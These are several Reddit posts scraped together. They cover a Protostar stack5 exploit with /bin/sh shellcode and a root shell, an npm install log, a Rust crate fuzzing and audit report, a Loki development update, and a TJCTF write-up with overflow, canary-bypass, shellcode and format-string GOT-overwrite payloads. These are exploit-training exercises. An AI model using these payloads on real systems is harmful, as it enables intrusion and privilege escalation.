[email protected]:/opt/protostabin$ (python -c "import sys; sys.stdout.write('\x90'*76 + '\xc0\xf7\xff\xbf' + '90'*10 + '\x83\xc4\x10\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80')";) | ./stack5 # whoami root 

EDIT :
I add python script exploit for reference :

Shellcode inside the buffer (not working)
import struct totalpad = 76 # Total bytes needed to start overwriting EIP NOP = "\x90" * 5 shellcode = "\x83\xc4\x10\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" EIP = struct.pack("I", 0xbffff770) nbpad = totalpad - len(NOP) - len(shellcode) PAD = 'A' * nbpad print NOP + shellcode + PAD + EIP 
Shellcode outside the buffer (working good)
import struct NOP1 = "\x90" * 76 EIP = struct.pack("I", 0xbffff7c0) NOP2 = "\x90" * 10 shellcode = "\x83\xc4\x10\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" print NOP1 + EIP + NOP2 + shellcode 
EDIT : shellcode inside the buffer is now working :-)
When executing outside gdb and attaching to the process I see that the start of the buffer is located at another memory adress.
So instead of hardcoding EIP start of buffer I use a register to jump to.
Hopefully there is one that hold the good adress: eax
Here is the working exploit of Shellcode inside the buffer:
import struct totalpad = 76 # Total bytes needed to start overwriting EIP # Little NOP Slide NOP = "\x90" * 2 # Shellcode maintaing / reopening stdin (for gets exploitation) shellcode = "\x83\xc4\x10\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" # Buffer start adress is 0xbfff770 but to hardcode adress is unreliable # EIP = struct.pack("I", 0xbffff770) # We will use a register to jump on the start of the buffer # We know debugging the program that eax contain the adress we want # We look with objdump -D stack5 -M intel | grep call | grep eax # 80483bf: ff d0 call eax # 804846b: ff d0 call eax # We have to adress that will call eax so that can trigger our exploit ! # EIP will call the adress that will "call eax" EIP = struct.pack("I", 0x80483bf) # We let EBP option either to rewrite trash or to use its original adress EBP = struct.pack("I", 0xbfff7b8) #EBP = "BBBB" nbpad = totalpad - len(NOP) - len(shellcode) - len(EBP) PAD = 'A' * nbpad # our payload print NOP + shellcode + PAD + EBP + EIP 
Usage :
$ python /home/usepython_exploits/stack5_inside_buffer.py | /opt/protostabin/stack5 # whoami root 
Stéphane
submitted by tequilaweb81 to LiveOverflow [link] [comments]

Troubles installing nativefier

I try to install nativefier running the command ntm install nativefier and get this error:
npm WARN deprecated [email protected]: [email protected]<3 is no longer maintained and not recommended for usage due to the number of issues. Please, upgrade your dependencies to the actual version of [email protected]
npm WARN deprecated [email protected]: request has been deprecated, see https://github.com/request/request/issues/3142

> [email protected] postinstall /home/vasco/node_modules/babel-polyfill/node_modules/core-js
> node -e "try{require('./postinstall')}catch(e){}"


> [email protected] postinstall /home/vasco/node_modules/babel-runtime/node_modules/core-js
> node -e "try{require('./postinstall')}catch(e){}"

/home/vasco
├─┬ [email protected]
│ └─┬ [email protected]
│ └─┬ [email protected]
│ └── [email protected]
└─┬ [email protected]
├── [email protected]
├─┬ [email protected]
│ ├─┬ [email protected]
│ │ └─┬ [email protected]
│ │ └── [email protected]
│ └── [email protected]
├─┬ [email protected]
│ ├─┬ [email protected]
│ │ ├── [email protected]
│ │ └── [email protected]
│ ├── [email protected]
│ └── [email protected]
├─┬ [email protected]
│ ├─┬ [email protected]
│ │ ├── [email protected]
│ │ ├── css-what[email protected]
│ │ ├── [email protected]
│ │ └── [email protected]
│ ├─┬ [email protected]
│ │ └── [email protected]
│ ├── [email protected]
│ ├─┬ [email protected]
│ │ ├── [email protected]
│ │ └── [email protected]
│ └── [email protected]
├── [email protected]
├─┬ [email protected]
│ ├─┬ asa[email protected]
│ │ ├── [email protected]
│ │ ├── [email protected]
│ │ ├── [email protected]
│ │ ├─┬ [email protected]
│ │ │ └─┬ [email protected]
│ │ │ ├── [email protected]
│ │ │ └── [email protected]
│ │ ├─┬ [email protected]
│ │ │ ├─┬ [email protected]
│ │ │ │ ├─┬ [email protected]
│ │ │ │ │ ├── [email protected]
│ │ │ │ │ └─┬ [email protected]
│ │ │ │ │ └── [email protected]
│ │ │ │ ├── [email protected]
│ │ │ │ ├─┬ [email protected]
│ │ │ │ │ └── [email protected]
│ │ │ │ ├── [email protected]
│ │ │ │ ├─┬ [email protected]
│ │ │ │ │ ├── [email protected]
│ │ │ │ │ └── [email protected]
│ │ │ │ └─┬ [email protected]
│ │ │ │ └── [email protected]
│ │ │ ├─┬ [email protected]
│ │ │ │ ├── [email protected]
│ │ │ │ ├── [email protected]
│ │ │ │ └─┬ [email protected]
│ │ │ │ └── [email protected]
│ │ │ └─┬ [email protected]
│ │ │ ├── [email protected]
│ │ │ ├── [email protected]
│ │ │ ├── [email protected]
│ │ │ ├─┬ [email protected]
│ │ │ │ └── [email protected]
│ │ │ ├── [email protected]
│ │ │ ├── [email protected]
│ │ │ ├─┬ [email protected]
│ │ │ │ └── [email protected]
│ │ │ ├─┬ [email protected]
│ │ │ │ ├─┬ [email protected]
│ │ │ │ │ ├── [email protected]
│ │ │ │ │ ├── [email protected]
│ │ │ │ │ ├── [email protected]
│ │ │ │ │ └── [email protected]
│ │ │ │ └── [email protected]
│ │ │ ├─┬ [email protected]
│ │ │ │ ├── [email protected]
│ │ │ │ ├─┬ [email protected]
│ │ │ │ │ ├── [email protected]
│ │ │ │ │ ├── [email protected]
│ │ │ │ │ └── [email protected]
│ │ │ │ └─┬ [email protected]
│ │ │ │ ├── [email protected]
│ │ │ │ ├── [email protected]
│ │ │ │ ├── [email protected]
│ │ │ │ ├── [email protected]
│ │ │ │ ├── [email protected]
│ │ │ │ ├── [email protected]
│ │ │ │ ├── [email protected]
│ │ │ │ └── [email protected]
│ │ │ ├── [email protected]
│ │ │ ├── [email protected]
│ │ │ ├─┬ [email protected]
│ │ │ │ └── [email protected]
│ │ │ ├── [email protected]
│ │ │ ├── [email protected]
│ │ │ ├── [email protected]
│ │ │ ├── [email protected]
│ │ │ └── [email protected]
│ │ └── [email protected]
│ ├── [email protected]
│ ├─┬ [email protected]
│ │ ├── [email protected]
│ │ ├── [email protected]
│ │ ├── [email protected]
│ │ ├── [email protected]
│ │ ├─┬ [email protected]
│ │ │ ├─┬ [email protected]
│ │ │ │ └── [email protected]
│ │ │ ├── [email protected]
│ │ │ ├─┬ [email protected]
│ │ │ │ ├── [email protected]
│ │ │ │ └─┬ [email protected]
│ │ │ │ ├─┬ [email protected]
│ │ │ │ │ └── [email protected]
│ │ │ │ ├── [email protected]
│ │ │ │ ├─┬ [email protected]
│ │ │ │ │ ├─┬ [email protected]
│ │ │ │ │ │ └── [email protected]
│ │ │ │ │ └── [email protected]
│ │ │ │ ├── [email protected]
│ │ │ │ ├── [email protected]
│ │ │ │ ├── [email protected]
│ │ │ │ ├─┬ [email protected]
│ │ │ │ │ ├─┬ [email protected]
│ │ │ │ │ │ ├── [email protected]
│ │ │ │ │ │ └─┬ [email protected]
│ │ │ │ │ │ └── [email protected]
│ │ │ │ │ └─┬ [email protected]
│ │ │ │ │ ├─┬ [email protected]
│ │ │ │ │ │ ├── [email protected]
│ │ │ │ │ │ └─┬ [email protected]
│ │ │ │ │ │ └── [email protected]
│ │ │ │ │ └─┬ [email protected]
│ │ │ │ │ └── [email protected]
│ │ │ │ ├─┬ [email protected]
│ │ │ │ │ ├─┬ [email protected]
│ │ │ │ │ │ └─┬ [email protected]
│ │ │ │ │ │ └── [email protected]
│ │ │ │ │ └── [email protected]
│ │ │ │ └── [email protected]
│ │ │ ├─┬ [email protected]
│ │ │ │ ├── [email protected]
│ │ │ │ └─┬ [email protected]
│ │ │ │ ├─┬ [email protected]
│ │ │ │ │ ├── [email protected]
│ │ │ │ │ └── [email protected]
│ │ │ │ └─┬ [email protected]
│ │ │ │ └── [email protected]
│ │ │ ├─┬ [email protected]
│ │ │ │ └─┬ [email protected]
│ │ │ │ ├── [email protected]
│ │ │ │ ├─┬ [email protected]
│ │ │ │ │ └── [email protected]
│ │ │ │ └─┬ [email protected]
│ │ │ │ └── ansi-reg[email protected]
│ │ │ └── [email protected]
│ │ ├── [email protected]
│ │ ├─┬ [email protected]
│ │ │ ├── [email protected]
│ │ │ ├── [email protected]
│ │ │ └── [email protected]
│ │ ├── [email protected]
│ │ └─┬ [email protected]
│ │ └─┬ [email protected]
│ │ └── [email protected]
│ ├─┬ [email protected]
│ │ ├── [email protected]
│ │ ├── [email protected]
│ │ ├─┬ [email protected]
│ │ │ └── [email protected]
│ │ ├─┬ [email protected]
│ │ │ └─┬ [email protected]
│ │ │ ├── [email protected]
│ │ │ └── [email protected]
│ │ ├── [email protected]
│ │ └─┬ [email protected]
│ │ ├── [email protected]
│ │ └── [email protected]
│ ├── [email protected]
│ ├─┬ [email protected]
│ │ ├── [email protected]
│ │ ├─┬ [email protected]
│ │ │ └── [email protected]
│ │ └── [email protected]
│ ├─┬ [email protected]
│ │ ├─┬ [email protected]
│ │ │ └── [email protected]
│ │ ├── [email protected]
│ │ └─┬ [email protected]
│ │ ├─┬ [email protected]
│ │ │ └─┬ [email protected]
│ │ │ └─┬ [email protected]
│ │ │ └─┬ [email protected]
│ │ │ └── [email protected]
│ │ └─┬ [email protected]
│ │ ├─┬ [email protected]
│ │ │ ├─┬ [email protected]
│ │ │ │ └─┬ [email protected]
│ │ │ │ └── [email protected]
│ │ │ ├── [email protected]
│ │ │ └── [email protected]
│ │ ├─┬ [email protected]
│ │ │ ├── [email protected]
│ │ │ ├── [email protected]
│ │ │ └─┬ [email protected]
│ │ │ ├─┬ [email protected]
│ │ │ │ └── [email protected]
│ │ │ └─┬ [email protected]
│ │ │ └── [email protected]
│ │ └── [email protected]
│ ├─┬ [email protected]
│ │ ├── [email protected]
│ │ └── [email protected]
│ ├─┬ [email protected]
│ │ └── [email protected]
│ ├─┬ [email protected]
│ │ ├── [email protected]
│ │ ├── [email protected]
│ │ └── [email protected]
│ ├── [email protected]
│ ├─┬ [email protected]
│ │ └── [email protected]
│ ├── [email protected]
│ └─┬ [email protected]
│ └── [email protected]
├─┬ [email protected]
│ ├─┬ [email protected]
│ │ └─┬ [email protected]
│ │ ├─┬ [email protected]
│ │ │ └── [email protected]
│ │ └── [email protected]
│ ├─┬ [email protected]
│ │ ├─┬ [email protected]
│ │ │ ├── [email protected]
│ │ │ ├── [email protected]
│ │ │ └─┬ [email protected]
│ │ │ ├── [email protected]
│ │ │ └── [email protected]
│ │ └─┬ [email protected]
│ │ ├── [email protected]
│ │ ├── [email protected]
│ │ ├── [email protected]
│ │ ├── [email protected]
│ │ ├── [email protected]
│ │ ├─┬ [email protected]
│ │ │ ├── [email protected]
│ │ │ ├── [email protected]
│ │ │ ├── [email protected]
│ │ │ └─┬ [email protected]
│ │ │ ├── [email protected]
│ │ │ ├── fast-levenshte[email protected]
│ │ │ ├── [email protected]
│ │ │ ├── [email protected]
│ │ │ ├── [email protected]
│ │ │ └── [email protected]
│ │ ├── [email protected]
│ │ ├── [email protected]
│ │ ├── [email protected]
│ │ ├── [email protected]
│ │ ├─┬ [email protected]
│ │ │ ├── [email protected]
│ │ │ └── [email protected]
│ │ ├── [email protected]
│ │ ├─┬ [email protected]
│ │ │ └── [email protected]
│ │ └── [email protected]
│ └─┬ [email protected]
│ └── [email protected]
├─┬ [email protected]
│ └── [email protected]
├── [email protected]
├── [email protected]
├─┬ [email protected]
│ ├─┬ [email protected]
│ │ └─┬ [email protected]
│ │ └─┬ [email protected]
│ │ └── [email protected]
│ ├─┬ [email protected]
│ │ └─┬ [email protected]
│ │ ├── [email protected]
│ │ ├── [email protected]
│ │ └─┬ [email protected]
│ │ ├── [email protected]
│ │ └── [email protected]
│ ├── [email protected]
│ └─┬ [email protected]
│ └── [email protected]
├── [email protected]
├─┬ [email protected]
│ ├─┬ [email protected]
│ │ ├── [email protected]
│ │ ├── [email protected]
│ │ └── [email protected]
│ ├── [email protected]
│ └── [email protected]
├─┬ [email protected]
│ └── [email protected]
├─┬ [email protected]
│ └── [email protected]
└── [email protected]

npm WARN enoent ENOENT: no such file or directory, open '/home/vasco/package.json'
npm WARN vasco No description
npm WARN vasco No repository field.
npm WARN vasco No README data
npm WARN vasco No license field.
submitted by JeanEdouardKevin to linuxquestions [link] [comments]

Auditing popular crates: how a one-line unsafe has nearly ruined everything

Edit: this is a rather long post that's not very readable on old Reddit's grey background. Click here to read it on Medium.
Following the actix-web incident (which is fixed now, at least mostly) I decided to poke other popular libraries and see what comes of it. The good news is I've poked at 6 popular crates now, and I've got not a single actually exploitable vulnerability. I am impressed. When I poked popular C libraries a few years ago it quickly ended in tears security vulnerabilities. The bad news is I've found one instance that was not a security vulnerability by sheer luck, plus a whole slew of denial-of-service bugs. And I can't fix all of them by myself. Read on to find out how I did it, and how you can help!
My workflow was roughly like this:
  1. See if the crate has been fuzzed yet to identify low-hanging fruit.
  2. If it has been fuzzed, check sanity of fuzzing harness.
  3. If something is amiss, fuzz the crate.
  4. In case fuzzing turns up no bugs, eyeball the unsafes and try to check them for memory errors.
  5. If no horrific memory errors turn up, try to replace whatever's under unsafe with safe code without sacrificing performance.
Turns out Rust community is awesome and not only has excellent integration for all three practical fuzzers along with a quick start guide for each, but also a huge collection of fuzz targets that covers a great deal of popular crates. Ack! Getting low-hanging fruit at step 1 is foiled!
So I've started checking whether fuzzing targets were written properly. Specifically, I've started looking for stuff that could block fuzzing - like checksums. A lot of formats have them internally, and PNG has not one but two - crc32 in png format and adler32 in deflate. And lo and behold, none of the crates were actually disabling checksums when fuzzing! This means that random input from fuzzer was rejected early (random data does not have a valid checksum in it, duh) and never actually reached the interesting decoding bits. So I've opened PRs for disabling checksums during fuzzing in miniz_oxide, png, lodepng-rust, and ogg, and then fuzzed them with checksums disabled. This got me:
inflate crate was the first where fuzzing has turned up nothing at all, so I've started eyeballing its unsafes and trying to rewrite them into safe code. I've added a benchmarking harness and started measuring whether reverting back to safe code hurts performance. cargo bench was too noisy, but I've quickly discovered criterion which got me the precision I needed (did I mention Rust tooling is awesome?). I got lucky - there were two unsafes with two-line safe equivalent commented out, and reverting back to safe code created no measurable performance difference. Apparently the compiler got smarter since that code was written, so I've just reverted back to safe code.
This left just one unsafe with a single line in it. Spot the security vulnerability. I would have missed it if the crate maintainer hadn't pointed it out. If you can't, there are hints at the end of this post.
By sheer luck the rest of the crate just so happens to be structured in a way that never passes input parameters that trigger the vulnerability, so it is not really exploitable. Probably. I could not find a way to exploit it, and the crate maintainer assures me it's fine. Perhaps we just haven't figured out how to do it yet. After all, almost everything is exploitable if you try hard enough.
Sadly, simply replacing the unsafe .set_len() with .resize() regressed the decompression performance by 10%, so instead I've added an extra check preventing this particular exploit from happening, and then liberally sprinkled the function with asserts that panic on every other way this unsafe could go wrong that I could think of.
Is the function secure now? Well, maybe. Maybe not. Unless we either rewrite it in safe rust (or prove its correctness, which is a lot harder) we will never know.
The thing is, I'm pretty sure it's possible to rewrite this in safe Rust without performance penalty. I've tried some local optimizations briefly, to no avail. Just like with high-level languages, writing fast safe Rust requires staying on the optimizer's happy paths, and I have not found any documentation or tooling for doing that. The best I've got is https://godbolt.org/ that lets you inspect the LLVM IR as well as assembler and shows what line of Rust turned into what line of assembly, but you can't feed your entire project to it. You can get rustc to dump LLVM IR, but it will not tell you what line turned into what (at least by default), let alone do readable highlighting. As pointed out in comments, cargo-asm that does the trick! And you also need tools to understand why a certain optimization was not applied by rustc. LLVM flags -Rpass-missed and -Rpass-analysis seem to be capable of doing that, but there is literally no documentation on them in conjunction with Rust.
Discussing the vulnerability further would be spoilerrific (seriously, try to locate it yourself), so I'll leave further technical discussion until the end of the post. I want to say that I was very satisfied with how the crate maintainer reacted to the potential vulnerability - he seemed to take it seriously and investigated it promptly. Coming from C ecosystem it is refreshing to be taken seriously when you point out those things.
By contrast, nobody seems to care about denial of service vulnerabilities. In the 3 crates I've reported such vulnerabilities for, after 3 weeks not a single one was investigated or fixed by maintainers of those crates, or anyone else really. And the DoS bugs are not limited to panics that you can just isolate into another thread and forget about.
After not getting any reaction from crate maintainers for a while I tried fixing those bugs myself, starting with the png crate. In stark contrast to C, it is surprisingly easy to jump into an existing Rust codebase and start hacking on it, even if it does rather involved things like PNG parsing. I've fixed all the panics that fuzzers discovered based on nothing but debug mode backtraces, and I don't even know Rust all that well. Also, this is why there are 4 distinct panics listed for PNG crate: I've fixed one and kept fuzzing until I discovered the next one. lewton probably has many more panics in it, I just didn't got beyond the first one. Sadly, three weeks later my PR is still not merged, reinforcing the theme of "nobody cares about denial of service". And png still has a much nastier DoS bug that cannot be isolated in a thread.
(To be clear, this is not meant as bashing any particular person or team; there may be perfectly valid reasons for why it is so. But this does seem to be the trend throughout the ecosystem, and I needed some examples to illustrate it).
Also, shoutout to tungstenite - it was the only crate that did not exhibit any kinds of bugs when being fuzzed for the first time. Kudos.
Conclusions:
Originally I thought this would be a fun exercise for a few weekends, but the scope of the work quickly grew way beyond what I can hope to achieve alone. This is where you come in, though! Here's a list of things you can try, in addition to the hard tooling tasks listed above:
  1. Fuzz all the things! It takes 15 minutes to set up per crate, there is no reason not to. Also, there is a trophy case.
  2. Fix bugs already discovered. For example: panic in lewton (easy), unbounded memory consumption in png (intermediate), lodepng memory leak (C-hard). You can also fuzz lewton afterwards to get more panics, just don't forget to use ogg dependency from git. You can reuse my fuzz harnesses if you wish.
  3. Refactor unsafes in popular crates into safe code, ideally without sacrificing performance. For example, inflate crate has just one unsafe block remaining, png has two. There are many more crates like that out there.
  4. There are easy tasks on docs and tooling too: AFL.rs documentation is outdated and describes only version 0.3. Version 0.4 has added in-process fuzzing that's ~10x faster, it needs to be mentioned. Also, AFL could use more Rusty integration with Cargo, closer to what cargo-fuzz does. Also, disabling checksums is a common pitfall that needs to be mentioned.
I'd love to keep fixing all the things, but at least in the coming month I will not able to dedicate any time to the project. I hope I've managed to at least lead by example.
And now, details on that vulnerability! If you haven't found it yourself, here's a hint: similar bugs in C libraries.
If you still haven't found it, see the fix.
Spoilerrific discussion of the vulnerability below.
Vulnerable code from git history for reference
The function run_len_dist() does a fairly trivial thing: resizes a vector to fit a specified amount of data and copies data from element i to element i+dist until i+dist hits the end of the vector. For performance, contents of the vector are not initialized to zeroes when resizing, as it would have been done by vec.resize(); instead, vec.set_len() is used, creating a vector with a number of elements set to uninitialized memory at the end.
The function never checks that dist is not zero. Indeed, if you call it with dist set to 0, it will simply read uninitialized memory and write it right back, exposing memory contents in the output.
If this vulnerability were actually exploitable from the external API (which it isn't, probably), inflate would have output contents of uninitialized memory in the decompressed output. inflate crate is used in png crate to decompress PNGs. So if png crate was used in a web browser (e.g. servo) to decode images, an attacker could pass a crafted PNG to the client, then read the decoded image using javascript. This lets the attacker read memory contents from the browser - cookies, passwords, you name it. This is not quite as bad as Heartbleed or Meltdown, but it's up there.
Sadly, regular fuzzing would not have discovered this vulnerability. If it were actually exploitable, at least one way to trigger it would involve setting several distinct bytes in the input to very specific values. And even the best current generation fuzzers cannot trigger any behavior that requires changing more than one byte simultaneously, except in rare cases or if you explicitly tell what consecutive byte strings it should try. And there is nothing in the code that would guide the fuzzers to these specific values.
Even if fuzzers did discover such an input by random chance, they would not have recognized it as a vulnerability, unless you do either of these things:
This just goes to show that fuzzing unsafe code does not actually guarantee absence of bugs.
Safe Rust, however, does guarantee absence of memory errors that lead to arbitrary code execution exploits and other unspeakable horrors. So let's use it.
submitted by Shnatsel to rust [link] [comments]

Weekly Dev Update 08/07/2019

Hey Y’all,
We’ve been busy bug catching this week! The testnet period for 4.0.0 Hefty Heimdall is still running, and we’re still working hard to track down a number of bugs that have appeared.
Last week we released the beta version of Loki Messenger, which was well received. Through testing we discovered a number of bugs so we’ve released an updated version which can be found on Github.
Service Node operators should download and update to the 3.0.7 release which includes security patches for some DoS bugs found in Monero. Click here for instructions: https://lokidocs.com/ServiceNodes/SNFullGuide/#updating-your-binaries.

Loki Core
---------------------------
Loki Launcher
The Loki Launcher is a node JS package that will allow for the independent management of all the components required to run a full Service Node. This includes managing Lokinet, lokid, the Loki Storage Server and any other future applications we require. When Loki Service Nodes begin to route data and store messages for Lokinet and Loki Messenger, we’ll recommend that every single Service Node run the Loki Launcher.
What’s going on this week with Loki Launcher:
We released the updated Loki Launcher for the testnet and got some real world testing done. Several bugs were found and squashed. Additionally our 3.0.7 release turned more users to the launcher for the first time. We took on all the community feedback and tried to reduce confusion to improve the user experience.
Changelog:
Github Pulse: Excluding merges, 1 author has pushed 41 commits to master and 41 commits to all branches. On master, 14 files have changed and there have been 479 additions and 198 deletions.
---------------------------
Lokinet
If you’re on our Discord you might catch Jeff or Ryan, the developers of LLARP, live streaming as they code: https://www.twitch.tv/uguu25519, https://www.twitch.tv/neuroscr.
What’s going on this week with Lokinet:
We tried to remove cppbackport and refactor the configuration system, however after review we decided to revert some changes. We also attempted to fix the broken MacOS port and made some minor protocol improvements.
Changelog:
Pull Requests:
--------------------------
Loki Locker
After taking feedback from the Loki Locker beta testing period, we will soon be releasing an updated version for public usage.
--------------------------
Loki Messenger Desktop
Storage Server
Messenger Mobile (iOS and Android)
https://github.com/loki-project/loki-messenger-android/commits/master.
--------------------------
Thanks,
Kee
submitted by Keejef to LokiProject [link] [comments]

TJCTF 2018 - Binary Exploitation Guide

Hello, I am pretty new here and I just create a full guide for all pwn challenges from TJCTF.
I hope you'll enjoy them, here is the original link on medium: https://medium.com/@mihailferaru2000/tjctf-2018-full-binary-exploitation-walk-through-a72a9870564e

Math Whiz

We have a simple binary that will show us the flag if we could become admin.
if (admin) { printf("Successfully registered '%s' as an administrator account!\n", username); printf("Here is your flag: %s\n", FLAG); } else { printf("Successfully registered '%s' as an user account!\n", username); } 
But the admin variable is not set anywhere, so we need to pwn it. It will be pretty easy as we have the source code provided. If we take a look at the input function, we observe that it reads specified size multiplied by 16. The most obvious buffer overflow is when the PIN code gets read:
input(recoverypin, 4); 
This means that we read 64 bytes in a 4-byte array. We also see that the admin variable is declared before the buffers, so the question is how could we override it? Lucky enough, modern compilers move buffers before any other variables in order to get them way from the return pointer, but in our case, we are in advantage. Finally, any input larger than 52 bytes will provide us this beauty: tjctf{d4n63r0u5_buff3r_0v3rfl0w5}

Tilted Troop

We’ve got a binary that should read 8 team members with random strengths and simulate a battle with some fantastic creature. If the sum of strengths is our goal (400 in this case), we will get the flag. Again, we have the source code, so our life is a lot easier when we don’t have to disassemble. We see that the array of strengths is kept right after the array of names and maybe we could override somehow.
Checking how bound checks are done, we can spot a bug:
if(t.teamSize > MAX_TEAM_SIZE) 
Array indexing starts from 0, so from 0 to MAX_TEAM_SIZE there are MAX_TEAM_SIZE + 1 elements. We need to create 8 members in our team and then just override the strength variable.
for i in range(4): io.recvline() for i in range(8): io.sendline('A test') # this will override strength buffer # 'd' = 100 => 'd' * 4 = 400 io.sendline('A dddd') io.sendline('F') io.interactive() 
And here it is: tjctf{0oPs_CoMP4Ri5ONs_r_h4rD}
Full solution: https://github.com/JustBeYou/ctfs/blob/mastetjctf2018/strover.py

Future Canary Lab

Again, we have to deal with variable overriding, but this time we have some kind of protection:
// canary generation for (i = 0; i < 10; ++i) { canary[i] = check[i] = rand(); } // ... // canary check for (j = 0; j < 10; ++j) { if (canary[j] != check[j]) { printf("Alas, it would appear you lack the time travel powers we desire.\n"); exit(0); } } 
If you are familiar with stack canaries (or stack cookies) you easily recognize that this is a handmade implementation. As rand() is not a secure function, we could reproduce its return values for sure. In the **main() **function we see that it is initialized with the seed of current time, so it is pretty vulnerable. Using the current time when we connect to the server as the seed, we can generate the values from the canary. Here we have a little C program to generate 10 random values based on our seed:
int main(int argc, char **argv) { int seed = atoi(argv[1]); srand(seed); for (int i = 0; i <= 9; i++) { printf("%d\n", rand()); } return 0; } 
Now, as we bypassed the canary, we need to satisfy the following condition:
if (secret - i + j == 0xdeadbeef) 
secret is always 0, i could be overridden by us and j is always 10, so we need to override i with 0x2152411b to solve the equation.
At the end we have: tjctf{3l_p5y_k0n6r00_0ur_n3w357_l4b_m3mb3r!}
Full solution: https://github.com/JustBeYou/ctfs/blob/mastetjctf2018/interview.py
We were given a small demo banking system. We have the source code, so a vulnerability will be pretty easy to spot. At first it looks pretty secure, but if we take a look at the verify_pin() function we see a clear buffer overflow. Let’s run a checksec to see what protection does this binary implies:
[[email protected] tjctf2018]$ checksec problem [*] '/home/littlewho/ctfs/tjctf2018/problem' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments 
It does not have any stack canary or any other execution prevention, so the solution is straightforward. The name array is global so it is stored in the BSS section and we know its address: 0x6010A0. We could store our shellcode here and then use the overflow to jump here.
; execve(["/bin/sh",], [], []) bits 64 push 0x68 mov rax, 0x732f2f6e69622f2f push rax mov rdi, rsp xor rsi, rsi xor rdx, rdx xor r10, r10 mov rax, 0x3b syscall 
Compile it as raw binary using nasm in order to easily use it. The layout of the attack vector is:
4 chars for PIN + 13 bytes to fill the buffer and the RBP + RIP 
Running the exploit
Flag: tjctf{d4n6_17_y0u_r0pp3d_m3_:(}
Full solution: https://github.com/JustBeYou/ctfs/blob/mastetjctf2018/problem.py

Secure Secrets

Challenges until now were pretty easy, the real fun starts now. Don’t get scary, they are still easy, but they need a little bit more amount of work than others as we don’t have the source code anymore and we need to do format string exploitation.
Running the application
This is how the application looks. It just reads a password and a message then shows the message. Let’s open the binary in IDA Pro (or Hopper). Both of them could generate pseudo-code of the program (press F5 in IDA or search in top menu of Hopper), but for now let’s analyze some Assembly.
We don’t see any buffer overflow, but the following code from get_message() looks interesting:
.text:0804885D mov eax, [ebp+arg_0] .text:08048860 mov [ebp+var_2C], eax ... .text:080488EC push [ebp+var_2C] ; format .text:080488EF call _printf .text:080488F4 add esp, 10h 
var_2C is the argument passed to the function and it represents our message and it is passed directly to printf() and that means: format string vulnerability! The scenario could be classic: leak libc, overwrite some function GOT with system, pass “/bin/sh” to it and get the flag, but it is even easier, after investigating the binary a little bit more we see another function named get_secret() that has some pretty interesting code in it:
.text:08048727 push offset modes ; "r" .text:0804872C push offset filename ; "flag.txt" .text:08048731 call _fopen 
So it is clear, we need to overwrite some GOT entry with the address of this function. I will chose **puts() **as it is called after our exploit few times. We need to write 0x08048713 (get_secret) at 0x0804A028 ([email protected]) in order to get the flag. We will use 2 writes of 2 bytes. (if you are not familiar with this type of exploit read this and watch this) Before we craft our exploit, we need to know where our controlled is in order to pop addresses from it. If we set a breakpoint before the printf at 0x080488EF and dump the stack, we will see that %35$x is our buffer.
This is a short explanation for those who don’t understand how I got that number. Open the executable in GDB and put a breakpoint at that printf. Input something like this in the message: *AAAABBBB %x %x %x *and now continue. When the breakpoint is hit, dump the stack then step to the next instruction. The printf output will be something like:
AAAABBBB ffffc5ec f7fa05c0 fbad2887 
Now let’s search those values in the stack dump.
https://preview.redd.it/s3z41w6k4uf11.png?width=380&format=png&auto=webp&s=df5851f8c46c152453bccda96d78524a5f4e4734
In the first square, we have the dumped values by printf and in the second one the actual buffer. The distance from first printed argument to the buffer is of 35 arguments. So, when we will want to overwrite few addresses using **%n **format argument, we will put those addresses at the beginning of our buffer and we will use %$n syntax to access them. Let’s proceed further.
Using python I generated the payload in a pretty manner:
arg_off = 35 puts_GOT = 0x0804A028 get_secret_ADDR = 0x08048713 write1 = 0x0804 - 8 write2 = 0x8713 - write1 - 8 payload = p32(puts_GOT + 2) + p32(puts_GOT) + "%{}x%{}$hn%{}x%{}$hn".format(write1, arg_off, write2, arg_off + 1) 
First we write the bytes with a smaller value and then the rest. After running it we get: tjctf{n1c3_j0b_y0u_r34lly_GOT_m3_600d}
Full solution: https://github.com/JustBeYou/ctfs/blob/mastetjctf2018/secure.py

Super Secure Secrets

Running the application
We have almost the same challenge, but with improved security, so let’s do some standard checks.
Checks
Now, there is no get_secret() function, we have no buffer overflow, but we still have the same format string vulnerability in the view message functionality. We need to follow a classic scenario:
Leaking the libc implies dumping the stack before the printf and investigate if we have any libc address that could be accessed by our %$p trick. As we are using a 64-bit binary, first 5 arguments are passed using registers, so stack arguments start at 6. Let’s use *%6$p %7$p %8$p *to dump few values:
0x7fffffffd390 0x7fffffffd3b0 0x100000000 
Leaked arguments
Here we have the values we printed. Looking ahead we see this:
Libc address onto the stack
By dividing 0x1d8 offset by pointer size on 64-bit arch (8 bytes) we get the position 65. So at %65$p we have __libc_start_main+ and we can leak the base address of libc. Now, we have to problems ahead:
Let’s solve them one by one. So, we have two options to get the version of libc, first would be to leak the argument 65 on the webserver, take its signature (last 3 digits) and use https://libc.blukat.me/ or https://github.com/niklasb/libc-database to find the version. In that case, the leaked address is 0x7fdf0a8a7b97 (it changes every time, only the last digits remain, this is just an example) and its signature is b97. The second option is to use an already solved pwn challenge to connect to the server and leak the libc version, it is not very fair play, but remember this trick, it is very useful in some CTFs with esoteric libc versions.
Both solutions lead to the same answer: libc6_2.27–3ubuntu1_amd64
Searching for libc
